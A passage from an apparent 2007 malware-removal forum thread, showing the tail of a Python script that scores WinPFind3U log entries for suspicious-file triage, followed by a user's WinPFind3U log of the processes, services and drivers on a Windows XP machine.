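    r"VetEBoot.sys -> %System32%\drivers\VetEBoot.sys -> Computer Associates International, Inc. [Ver = 30.7.0.0 | Size = 108656 bytes | Modified Date = 5/4/2007 8:56:10 AM | Attr = ]",
    r"nvsvc32.exe -> %System32%\nvsvc32.exe -> NVIDIA Corporation [Ver = 6.14.10.8185 | Size = 131139 bytes | Modified Date = 10/10/2005 10:49:00 PM | Attr = ]",
]

# Assumed scan time: shortly after the newest timestamp in the log.
SCAN_DATE = datetime(2007, 6, 10, 3, 0, 0)


def parse_entry(line):
    """Return a dict for one entry, or None if the line is not a file entry."""
    m = ENTRY_RE.match(line.strip())
    if m is None:
        return None
    d = m.groupdict()
    return {
        "name": d["name"].strip(),
        "path": d["path"],
        "publisher": d["publisher"].strip(),
        "version": d["ver"].strip(),
        "size": int(d["size"]),
        "mtime": datetime.strptime(d["mtime"].strip(), "%m/%d/%Y %I:%M:%S %p"),
        "attr": d["attr"].strip().upper(),
    }


def _extension(path):
    tail = path.rsplit("\\", 1)[-1]
    return tail[tail.rfind("."):].lower() if "." in tail else ""


def score_entry(entry, scan_date, window_days=14):
    """Count the weak signals on one entry; returns (score, reasons).

    None of these alone is a verdict: plenty of legitimate files lack a version
    resource, and read-only is harmless by itself. The combination is what
    made istjor.exe and friends stand out in the thread.
    """
    reasons = []
    if not entry["version"]:
        reasons.append("no version resource")
    if not entry["publisher"]:
        reasons.append("no publisher string")
    parts = entry["path"].split("\\")
    if parts[0].lower() == "%system32%" and len(parts) == 2:
        reasons.append("sits directly in System32 (not a subfolder)")
    # A future timestamp is odd too, so only the upper bound is checked.
    if scan_date - entry["mtime"] <= timedelta(days=window_days):
        reasons.append(f"modified within {window_days} days of the scan")
    if "R" in entry["attr"]:
        reasons.append("read-only attribute set")
    return len(reasons), reasons


def triage(lines, scan_date, window_days=14, threshold=3):
    """Parse log lines and return executable entries scoring >= threshold, highest first."""
    hits = []
    for line in lines:
        entry = parse_entry(line)
        if entry is None or _extension(entry["path"]) not in EXEC_EXT:
            continue
        score, reasons = score_entry(entry, scan_date, window_days)
        if score >= threshold:
            hits.append({"name": entry["name"], "path": entry["path"], "score": score, "reasons": reasons})
    return sorted(hits, key=lambda h: (-h["score"], h["name"]))


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG, SCAN_DATE):
        print(f"{hit['score']}  {hit['path']}")
        for r in hit["reasons"]:
            print(f"      - {r}")
```

Entries that score high are candidates for a second look (hash lookup, publisher check), not an automatic delete list.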

#6 DigitalFool

DigitalFool
  • Topic Starter

  • Members
  • 39 posts
  • OFFLINE
  • Local time:03:36 PM

Posted 21 June 2007 - 10:43 PM

Sorry for the delay - computer has been suspect, but we'll see how it goes the next few days after your suggestions. Thank you btw.

1) WinPFind3 logfile created on: 6/21/2007 10:31:37 PM
WinPFind3U by OldTimer - Version 1.0.38 Folder = C:\Documents and Settings\Admin\Desktop\WinPFind3u\
Microsoft Windows XP Service Pack 2 (Version = 5.1.2600)
Internet Explorer (Version = 6.0.2900.2180)

510.98 Mb Total Physical Memory | 112.83 Mb Available Physical Memory | 22.08% Memory free
1.22 Gb Paging File | 0.85 Gb Available in Paging File | 69.62% Paging File free
Paging file location(s): C:\pagefile.sys 1028 2056;

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 36.97 Gb Total Space | 3.79 Gb Free Space | 10.24% Space Free
D: Drive not present or media not loaded
E: Drive not present or media not loaded
F: Drive not present or media not loaded

Computer Name: FAMILY
Current User Name: Admin
Logged in as Administrator.
Current Boot Mode: Normal


[Processes - Non-Microsoft Only]
avgas.exe -> %ProgramFiles%\Grisoft\AVG Anti-Spyware 7.5\avgas.exe -> GRISOFT s.r.o. [Ver = 7, 5, 1, 43 | Size = 6731312 bytes | Modified Date = 6/11/2007 4:25:42 AM | Attr = ]
cavrid.exe -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVRid.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 185456 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
cavtray.exe -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVTray.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 230512 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
ctsvccda.exe -> %System32%\CTsvcCDA.EXE -> Creative Technology Ltd [Ver = 1.0.1.0 | Size = 44032 bytes | Modified Date = 12/13/1999 2:01:00 AM | Attr = ]
diagent.exe -> %ProgramFiles%\Creative\SBLive\Diagnostics\diagent.exe -> Creative Technology Ltd [Ver = 1, 1, 4, 0 | Size = 135264 bytes | Modified Date = 4/3/2002 2:01:00 AM | Attr = ]
fxsvr2.exe -> %ProgramFiles%\Logitech\Video\FxSvr2.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 192512 bytes | Modified Date = 1/18/2005 5:08:36 PM | Attr = ]
guard.exe -> %ProgramFiles%\Grisoft\AVG Anti-Spyware 7.5\guard.exe -> GRISOFT s.r.o. [Ver = 7, 5, 1, 22 | Size = 312880 bytes | Modified Date = 5/30/2007 7:31:10 AM | Attr = ]
hotsync.exe -> %ProgramFiles%\Sony Handheld\HOTSYNC.EXE -> Palm, Inc. [Ver = 4.0.1 | Size = 299008 bytes | Modified Date = 5/31/2001 9:52:46 AM | Attr = ]
hpobnz08.exe -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpobnz08.exe -> Hewlett-Packard Co. [Ver = 4.2.0.021 | Size = 323646 bytes | Modified Date = 4/9/2003 6:41:38 PM | Attr = ]
hpoevm08.exe -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpoevm08.exe -> Hewlett-Packard Co. [Ver = 4.2.0.021 | Size = 286720 bytes | Modified Date = 4/9/2003 6:49:36 PM | Attr = ]
hposts08.exe -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hposts08.exe -> Hewlett-Packard Co. [Ver = 4.2.0.021 | Size = 311296 bytes | Modified Date = 4/9/2003 6:59:24 PM | Attr = ]
hpotdd01.exe -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe -> Hewlett-Packard [Ver = 1, 0, 0, 1 | Size = 28672 bytes | Modified Date = 4/9/2003 7:11:12 PM | Attr = ]
hpzipm12.exe -> %System32%\HPZipm12.exe -> HP [Ver = 6, 0, 0, 0 | Size = 65795 bytes | Modified Date = 3/9/2003 3:31:02 PM | Attr = ]
ipodservice.exe -> %ProgramFiles%\iPod\bin\iPodService.exe -> Apple Computer, Inc. [Ver = 7.0.2.16 | Size = 492608 bytes | Modified Date = 10/30/2006 10:36:32 AM | Attr = ]
isafe.exe -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\iSafe.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 259184 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
ituneshelper.exe -> %ProgramFiles%\iTunes\iTunesHelper.exe -> Apple Computer, Inc. [Ver = 7.0.2.16 | Size = 256576 bytes | Modified Date = 10/30/2006 10:36:36 AM | Attr = ]
logitray.exe -> %ProgramFiles%\Logitech\Video\LogiTray.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 217088 bytes | Modified Date = 1/18/2005 5:37:30 PM | Attr = ]
lvcomsx.exe -> %System32%\LVCOMSX.EXE -> Logitech Inc. [Ver = 8.4.1.1092 | Size = 221184 bytes | Modified Date = 10/8/2004 11:52:32 AM | Attr = ]
notifyalert.exe -> %ProgramFiles%\Dell\Support\Alert\bin\NotifyAlert.exe -> [Ver = 2.1.0.72 | Size = 352256 bytes | Modified Date = 10/7/2003 5:20:18 PM | Attr = ]
qttask.exe -> %ProgramFiles%\QuickTime\qttask.exe -> Apple Computer, Inc. [Ver = 7.1.3 | Size = 282624 bytes | Modified Date = 10/25/2006 7:58:18 PM | Attr = ]
support.exe -> %CommonProgramFiles%\Dell\EUSW\Support.exe -> Dell [Ver = 2, 1, 1, 0 | Size = 323584 bytes | Modified Date = 5/27/2004 9:05:42 PM | Attr = ]
usbswt.exe -> %ProgramFiles%\Sony Handheld\USBSwt.exe -> Sony Corporation [Ver = 1.10.0008210 | Size = 57344 bytes | Modified Date = 2/2/2001 12:13:00 AM | Attr = ]
vetmsg.exe -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\VetMsg.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 201840 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
viewmgr.exe -> %ProgramFiles%\Viewpoint\Viewpoint Manager\ViewMgr.exe -> Viewpoint Corporation [Ver = 2, 0, 0, 54 | Size = 112336 bytes | Modified Date = 1/4/2007 4:38:20 PM | Attr = ]
viewpointservice.exe -> %ProgramFiles%\Viewpoint\Common\ViewpointService.exe -> Viewpoint Corporation [Ver = 2, 0, 0, 54 | Size = 24652 bytes | Modified Date = 1/4/2007 4:38:10 PM | Attr = ]
winpfind3u.exe -> %UserDesktop%\WinPFind3u\WinPFind3U.exe -> OldTimer Tools [Ver = 1.0.38.0 | Size = 318976 bytes | Modified Date = 5/22/2007 6:27:40 PM | Attr = ]
winvnc4.exe -> %ProgramFiles%\RealVNC\VNC4\winvnc4.exe -> RealVNC Ltd. [Ver = 4.1.1 | Size = 455632 bytes | Modified Date = 3/11/2005 2:40:26 PM | Attr = ]
wlservice.exe -> %ProgramFiles%\Wireless-G Portable USB Adapter\WLService.exe -> GEMTEKS [Ver = 1, 0, 0, 4 | Size = 41025 bytes | Modified Date = 2/6/2004 10:56:14 PM | Attr = ]
wusb54gp.exe -> %ProgramFiles%\Wireless-G Portable USB Adapter\WUSB54GP.exe -> Cisco Linksys Corporation [Ver = 1.0.2.5 | Size = 4314112 bytes | Modified Date = 2/9/2004 4:38:22 PM | Attr = ]

[Win32 Services - Non-Microsoft Only]
(AVG Anti-Spyware Guard) AVG Anti-Spyware Guard [Win32_Own | Auto | Running] -> %ProgramFiles%\Grisoft\AVG Anti-Spyware 7.5\guard.exe -> GRISOFT s.r.o. [Ver = 7, 5, 1, 22 | Size = 312880 bytes | Modified Date = 5/30/2007 7:31:10 AM | Attr = ]
(CAISafe) CAISafe [Win32_Own | Auto | Running] -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\iSafe.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 259184 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(Creative Service for CDROM Access) Creative Service for CDROM Access [Win32_Own | Auto | Running] -> %System32%\CTsvcCDA.EXE -> Creative Technology Ltd [Ver = 1.0.1.0 | Size = 44032 bytes | Modified Date = 12/13/1999 2:01:00 AM | Attr = ]
(dmadmin) Logical Disk Manager Administrative Service [Win32_Shared | On_Demand | Stopped] -> %System32%\dmadmin.exe -> Microsoft Corp., Veritas Software [Ver = 2600.2180.503.0 | Size = 224768 bytes | Modified Date = 8/4/2004 2:56:48 AM | Attr = ]
(IDriverT) InstallDriver Table Manager [Win32_Own | On_Demand | Stopped] -> %CommonProgramFiles%\InstallShield\Driver\11\Intel 32\IDriverT.exe -> Macrovision Corporation [Ver = 11.00.28844 | Size = 69632 bytes | Modified Date = 4/4/2005 1:41:10 AM | Attr = ]
(iPod Service) iPod Service [Win32_Own | On_Demand | Running] -> %ProgramFiles%\iPod\bin\iPodService.exe -> Apple Computer, Inc. [Ver = 7.0.2.16 | Size = 492608 bytes | Modified Date = 10/30/2006 10:36:32 AM | Attr = ]
(NetSvc) Intel NCS NetService [Win32_Own | On_Demand | Stopped] -> %ProgramFiles%\Intel\NCS\Sync\NetSvc.exe -> Intel® Corporation [Ver = 1.2.26.0 | Size = 143360 bytes | Modified Date = 3/3/2003 2:33:40 PM | Attr = ]
(NVSvc) NVIDIA Display Driver Service [Win32_Own | Auto | Stopped] -> %System32%\nvsvc32.exe -> NVIDIA Corporation [Ver = 6.14.10.8185 | Size = 131139 bytes | Modified Date = 10/10/2005 10:49:00 PM | Attr = ]
(Pml Driver HPZ12) Pml Driver HPZ12 [Win32_Own | On_Demand | Running] -> %System32%\HPZipm12.exe -> HP [Ver = 6, 0, 0, 0 | Size = 65795 bytes | Modified Date = 3/9/2003 3:31:02 PM | Attr = ]
(VETMSGNT) VET Message Service [Win32_Own | Auto | Running] -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\VetMsg.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 201840 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(Viewpoint Manager Service) Viewpoint Manager Service [Win32_Own | Auto | Running] -> %ProgramFiles%\Viewpoint\Common\ViewpointService.exe -> Viewpoint Corporation [Ver = 2, 0, 0, 54 | Size = 24652 bytes | Modified Date = 1/4/2007 4:38:10 PM | Attr = ]
(WinVNC4) VNC Server Version 4 [Win32_Own | Auto | Running] -> %ProgramFiles%\RealVNC\VNC4\winvnc4.exe -> RealVNC Ltd. [Ver = 4.1.1 | Size = 455632 bytes | Modified Date = 3/11/2005 2:40:26 PM | Attr = ]
(WUSB54GPSVC) WUSB54GPSVC [Win32_Own | Auto | Running] -> %ProgramFiles%\Wireless-G Portable USB Adapter\WLService.exe -> GEMTEKS [Ver = 1, 0, 0, 4 | Size = 41025 bytes | Modified Date = 2/6/2004 10:56:14 PM | Attr = ]

[Driver Services - Non-Microsoft Only]
(a347bus) a347bus [Kernel | Boot | Running] -> %System32%\DRIVERS\a347bus.sys -> [Ver = 3.47.0.0 built by: WinDDK | Size = 160640 bytes | Modified Date = 4/30/2004 9:37:02 AM | Attr = ]
(a347scsi) a347scsi [Kernel | Boot | Running] -> %System32%\DRIVERS\a347scsi.sys -> [Ver = 3.47.0.0 built by: WinDDK | Size = 5248 bytes | Modified Date = 4/30/2004 9:33:00 AM | Attr = ]
(Abiosdsk) Abiosdsk [Kernel | Disabled | Stopped] -> -> File not found
(AFS2K) AFS2K [Kernel | System | Running] -> %System32%\drivers\AFS2K.SYS -> Oak Technology Inc. [Ver = 3.1.21.1103 | Size = 35840 bytes | Modified Date = 10/7/2004 8:16:04 PM | Attr = ]
(AliIde) AliIde [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\ALIIDE.SYS -> Acer Laboratories Inc. [Ver = 1.20 | Size = 5248 bytes | Modified Date = 8/17/2001 2:51:56 PM | Attr = ]
(amdagp) AMD AGP Bus Filter Driver [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\amdagp.sys -> Advanced Micro Devices, Inc. [Ver = 5.00 (xpsp_sp2_rtm.040803-2158) | Size = 43008 bytes | Modified Date = 8/4/2004 1:07:42 AM | Attr = ]
(asc) asc [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\ASC.SYS -> Advanced System Products, Inc. [Ver = 2.9I-MS (XPClient.010817-1148) | Size = 26496 bytes | Modified Date = 8/17/2001 2:52:00 PM | Attr = ]
(asc3550) asc3550 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\ASC3550.SYS -> Advanced System Products, Inc. [Ver = 3.1E-MS (XPClient.010817-1148) | Size = 14848 bytes | Modified Date = 8/17/2001 2:51:58 PM | Attr = ]
(atapi) Standard IDE/ESDI Hard Disk Controller [Kernel | Boot | Running] -> %System32%\DRIVERS\atapi.sys -> [Ver = | Size = 87296 bytes | Modified Date = 4/23/2003 10:29:54 AM | Attr = ]
(Atdisk) Atdisk [Kernel | Disabled | Stopped] -> -> File not found
(AVG Anti-Spyware Driver) AVG Anti-Spyware Driver [Kernel | System | Running] -> %ProgramFiles%\Grisoft\AVG Anti-Spyware 7.5\guard.sys -> [Ver = | Size = 11000 bytes | Modified Date = 5/30/2007 7:10:42 AM | Attr = ]
(AvgAsCln) AVG Anti-Spyware Clean Driver [Kernel | System | Running] -> %System32%\DRIVERS\AvgAsCln.sys -> GRISOFT, s.r.o. [Ver = 1.0.0.14 | Size = 10872 bytes | Modified Date = 5/30/2007 7:10:42 AM | Attr = ]
(bvrp_pci) bvrp_pci [Kernel | On_Demand | Stopped] -> -> File not found
(Changer) Changer [Kernel | System | Stopped] -> -> File not found
(CmdIde) CmdIde [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\CMDIDE.SYS -> CMD Technology, Inc. [Ver = 2.0.7 (XPClient.010817-1148) | Size = 6656 bytes | Modified Date = 8/17/2001 2:51:54 PM | Attr = ]
(dac2w2k) dac2w2k [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\DAC2W2K.SYS -> Mylex Corporation [Ver = 6.00-21 (XPClient.010817-1148) | Size = 179584 bytes | Modified Date = 8/17/2001 2:52:16 PM | Attr = ]
(dmboot) dmboot [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\dmboot.sys -> Microsoft Corp., Veritas Software [Ver = 2600.2180.503.0 | Size = 799744 bytes | Modified Date = 8/4/2004 1:07:18 AM | Attr = ]
(dmio) dmio [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\dmio.sys -> Microsoft Corp., Veritas Software [Ver = 2600.2180.503.0 | Size = 153344 bytes | Modified Date = 8/4/2004 1:07:16 AM | Attr = ]
(dmload) dmload [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\DMLOAD.SYS -> Microsoft Corp., Veritas Software. [Ver = 2600.0.503.0 | Size = 5888 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
(drvmcdb) drvmcdb [Kernel | Boot | Running] -> %System32%\DRIVERS\drvmcdb.sys -> Sonic Solutions [Ver = 3.21.65a | Size = 84576 bytes | Modified Date = 7/31/2003 4:21:00 AM | Attr = ]
(drvnddm) drvnddm [File_System | Auto | Running] -> %System32%\DRIVERS\drvnddm.sys -> Sonic Solutions [Ver = 2.56.38a | Size = 40448 bytes | Modified Date = 6/20/2003 3:56:00 AM | Attr = ]
(E100B) Intel® PRO Adapter Driver [Kernel | On_Demand | Running] -> %System32%\DRIVERS\e100b325.sys -> Intel Corporation [Ver = 7.0.26.0 built by: WinDDK | Size = 145408 bytes | Modified Date = 3/4/2003 1:56:26 PM | Attr = ]
(EL90XBC) 3Com EtherLink XL 90XB/C Adapter Driver [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\EL90XBC5.SYS -> 3Com Corporation [Ver = 4.05.00.0000 | Size = 66591 bytes | Modified Date = 8/17/2001 1:11:06 PM | Attr = ]
(ENTECH) ENTECH [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\Entech.sys -> EnTech Taiwan [Ver = 1.0 | Size = 20400 bytes | Modified Date = 10/21/1999 12:12:52 PM | Attr = ]
(GEARAspiWDM) GEARAspiWDM [Kernel | On_Demand | Running] -> %System32%\DRIVERS\GEARAspiWDM.sys -> GEAR Software Inc. [Ver = 2.0.6.1 | Size = 15664 bytes | Modified Date = 9/19/2006 4:44:04 PM | Attr = ]
(GTNDIS5) GTNDIS5 NDIS Protocol Driver [Kernel | On_Demand | Running] -> %System32%\GTNDIS5.sys -> Printing Communications Assoc., Inc. (PCAUSA) [Ver = 5.03.16.54 | Size = 15872 bytes | Modified Date = 9/25/2003 10:15:32 PM | Attr = ]
(HPZid412) IEEE-1284.4 Driver HPZid412 [Kernel | On_Demand | Running] -> %System32%\DRIVERS\hpzid412.sys -> HP [Ver = 6, 0, 0, 0 | Size = 51024 bytes | Modified Date = 3/9/2003 3:31:00 PM | Attr = ]
(HPZipr12) Print Class Driver for IEEE-1284.4 HPZipr12 [Kernel | On_Demand | Running] -> %System32%\DRIVERS\HPZipr12.sys -> HP [Ver = 6, 0, 0, 0 | Size = 16080 bytes | Modified Date = 3/9/2003 3:31:02 PM | Attr = ]
(HPZius12) USB to IEEE-1284.4 Translation Driver HPZius12 [Kernel | On_Demand | Running] -> %System32%\DRIVERS\HPZius12.sys -> HP [Ver = 6, 0, 0, 0 | Size = 21456 bytes | Modified Date = 3/9/2003 3:31:02 PM | Attr = ]
(i81x) i81x [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\i81xnt5.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 161020 bytes | Modified Date = 8/4/2004 12:29:36 AM | Attr = ]
(iAimFP0) iAimFP0 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wadv01nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 12415 bytes | Modified Date = 8/4/2004 12:29:38 AM | Attr = ]
(iAimFP1) iAimFP1 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wadv02nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 12127 bytes | Modified Date = 8/4/2004 12:29:38 AM | Attr = ]
(iAimFP2) iAimFP2 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wadv05nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 11775 bytes | Modified Date = 8/4/2004 12:29:38 AM | Attr = ]
(iAimFP3) iAimFP3 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wsiintxx.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 12063 bytes | Modified Date = 8/4/2004 12:29:48 AM | Attr = ]
(iAimFP4) iAimFP4 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wvchntxx.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 19455 bytes | Modified Date = 8/4/2004 12:29:50 AM | Attr = ]
(iAimTV0) iAimTV0 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\watv01nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 29311 bytes | Modified Date = 8/4/2004 12:29:42 AM | Attr = ]
(iAimTV1) iAimTV1 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\watv02nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 19551 bytes | Modified Date = 8/4/2004 12:29:42 AM | Attr = ]
(iAimTV2) iAimTV2 [Kernel | On_Demand | Stopped] -> System32\DRIVERS\wATV03nt.sys -> File not found
(iAimTV3) iAimTV3 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\watv04nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 33599 bytes | Modified Date = 8/4/2004 12:29:44 AM | Attr = ]
(iAimTV4) iAimTV4 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wch7xxnt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 23615 bytes | Modified Date = 8/4/2004 12:29:46 AM | Attr = ]
(IntelC51) IntelC51 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\IntelC51.sys -> Intel Corporation [Ver = 2.15.25.0 | Size = 1232741 bytes | Modified Date = 11/20/2003 11:13:40 PM | Attr = ]
(IntelC52) IntelC52 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\IntelC52.sys -> Intel Corporation [Ver = 4.58.1 | Size = 646825 bytes | Modified Date = 11/20/2003 11:14:28 PM | Attr = ]
(IntelC53) IntelC53 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\IntelC53.sys -> Intel Corporation [Ver = 2.15.25.0 | Size = 59717 bytes | Modified Date = 11/20/2003 11:12:56 PM | Attr = ]
(lbrtfdc) lbrtfdc [Kernel | System | Stopped] -> -> File not found
(LVUSBSta) Logitech USB Monitor Filter [Kernel | On_Demand | Running] -> %System32%\DRIVERS\LVUSBSta.sys -> Logitech Inc. [Ver = 8.4.6.1016 | Size = 22016 bytes | Modified Date = 1/31/2005 10:12:48 AM | Attr = ]
(mohfilt) mohfilt [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\mohfilt.sys -> Intel Corporation [Ver = 7.11.0.0 | Size = 37048 bytes | Modified Date = 11/20/2003 11:12:42 PM | Attr = ]
(mraid35x) mraid35x [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\MRAID35X.SYS -> American Megatrends Inc. [Ver = 6.19 (XPClient.010817-1148) | Size = 17280 bytes | Modified Date = 8/17/2001 2:52:12 PM | Attr = ]
(MxlW2k) MxlW2k [Kernel | On_Demand | Running] -> %System32%\drivers\MxlW2k.sys -> MusicMatch, Inc. [Ver = 1.1.0.116 | Size = 28256 bytes | Modified Date = 12/18/2004 6:56:24 PM | Attr = ]
(nv) nv [Kernel | On_Demand | Running] -> %System32%\DRIVERS\nv4_mini.sys -> NVIDIA Corporation [Ver = 6.14.10.8185 | Size = 3530432 bytes | Modified Date = 10/10/2005 10:49:00 PM | Attr = ]
(omci) OMCI WDM Device Driver [Kernel | System | Running] -> %System32%\DRIVERS\omci.sys -> Dell Computer Corporation [Ver = 7, 0, 323, 0 | Size = 17217 bytes | Modified Date = 11/8/2002 2:45:06 PM | Attr = ]
(P16X) Creative SB Live! Series (WDM) [Kernel | On_Demand | Running] -> %System32%\DRIVERS\P16X.sys -> Creative Technology Ltd. [Ver = 5.12.01.129 | Size = 1296384 bytes | Modified Date = 8/14/2003 11:58:12 AM | Attr = ]
(PCIDump) PCIDump [Kernel | System | Stopped] -> -> File not found
(PDCOMP) PDCOMP [Kernel | On_Demand | Stopped] -> -> File not found
(PDFRAME) PDFRAME [Kernel | On_Demand | Stopped] -> -> File not found
(PDRELI) PDRELI [Kernel | On_Demand | Stopped] -> -> File not found
(PDRFRAME) PDRFRAME [Kernel | On_Demand | Stopped] -> -> File not found
(pfc) Padus ASPI Shell [Kernel | On_Demand | Running] -> %System32%\DRIVERS\pfc.sys -> Padus, Inc. [Ver = 2, 5, 0, 200 | Size = 14604 bytes | Modified Date = 8/11/2003 10:07:46 AM | Attr = ]
(PfModNT) PfModNT [Kernel | Auto | Running] -> %System32%\PFMODNT.SYS -> Creative Technology Ltd. [Ver = 2.0.0.0 | Size = 6752 bytes | Modified Date = 12/17/1999 2:00:00 AM | Attr = ]
(PQNTDrv) PQNTDrv [Kernel | System | Running] -> %System32%\drivers\PQNTDRV.sys -> PowerQuest Corporation [Ver = 8.00.000 | Size = 4228 bytes | Modified Date = 4/16/2003 2:21:30 PM | Attr = ]
(PRISM_A02) 802.11a/g USB Driver [Kernel | On_Demand | Running] -> %System32%\DRIVERS\WUSB20XP.sys -> Cisco-Linksys, LLC. [Ver = 1.0.8 | Size = 339488 bytes | Modified Date = 1/7/2004 5:04:00 PM | Attr = ]
(Ptilink) Direct Parallel Link Driver [Kernel | On_Demand | Running] -> %System32%\DRIVERS\PTILINK.SYS -> Parallel Technologies, Inc. [Ver = 1.10 (XPClient.010817-1148) | Size = 17792 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
(PxHelp20) PxHelp20 [Kernel | Boot | Running] -> %System32%\DRIVERS\pxhelp20.sys -> Sonic Solutions [Ver = 2.02.57a | Size = 17168 bytes | Modified Date = 7/30/2003 3:02:00 AM | Attr = ]
(QCMerced) Logitech QuickCam Communicate [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\lvcm.sys -> [Ver = | Size = 585824 bytes | Modified Date = 10/8/2004 10:58:34 AM | Attr = ]
(ql1080) ql1080 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\QL1080.SYS -> QLogic Corporation [Ver = 3.04 | Size = 40320 bytes | Modified Date = 8/17/2001 2:52:20 PM | Attr = ]
(ql12160) ql12160 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\QL12160.SYS -> QLogic Corporation [Ver = 7.13.02 (W64) | Size = 45312 bytes | Modified Date = 8/17/2001 2:52:20 PM | Attr = ]
(ql1280) ql1280 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\QL1280.SYS -> QLogic Corporation [Ver = 7.13.01 (W2K) | Size = 49024 bytes | Modified Date = 8/17/2001 2:52:18 PM | Attr = ]
(Secdrv) Secdrv [Kernel | Auto | Running] -> %System32%\DRIVERS\secdrv.sys -> [Ver = | Size = 27440 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
(Simbad) Simbad [Kernel | Disabled | Stopped] -> -> File not found
(sisagp) SIS AGP Bus Filter [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\sisagp.sys -> Silicon Integrated Systems Corporation [Ver = 5.12.01.2010 (xpsp_sp2_rtm.040803-2158) | Size = 41088 bytes | Modified Date = 8/4/2004 1:07:42 AM | Attr = ]
(SoP1kUSB) Sony PEG Virtual Port [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\SoP1kUSB.sys -> Sony Corporation [Ver = 1.00.0006070 | Size = 29440 bytes | Modified Date = 10/9/2001 4:39:32 PM | Attr = ]
(Sparrow) Sparrow [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SPARROW.SYS -> Adaptec, Inc. [Ver = v2.0a (ReleaseBinaries.001205-1804) | Size = 19072 bytes | Modified Date = 8/17/2001 3:07:44 PM | Attr = ]
(sscdbhk5) sscdbhk5 [File_System | System | Running] -> %System32%\DRIVERS\sscdbhk5.sys -> Sonic Solutions [Ver = 1.10.81a | Size = 5621 bytes | Modified Date = 7/14/2003 12:28:40 PM | Attr = ]
(ssrtln) ssrtln [File_System | System | Running] -> %System32%\DRIVERS\ssrtln.sys -> Sonic Solutions [Ver = 1.10.81a | Size = 23219 bytes | Modified Date = 7/14/2003 12:28:22 PM | Attr = ]
(symc810) symc810 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SYMC810.SYS -> Symbios Logic Inc. [Ver = 5.1.2409.1 (ReleaseBinaries.001205-1804) | Size = 16256 bytes | Modified Date = 8/17/2001 3:07:34 PM | Attr = ]
(symc8xx) symc8xx [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SYMC8XX.SYS -> LSI Logic [Ver = 5.1.2409.1 (ReleaseBinaries.001205-1804) | Size = 32640 bytes | Modified Date = 8/17/2001 3:07:36 PM | Attr = ]
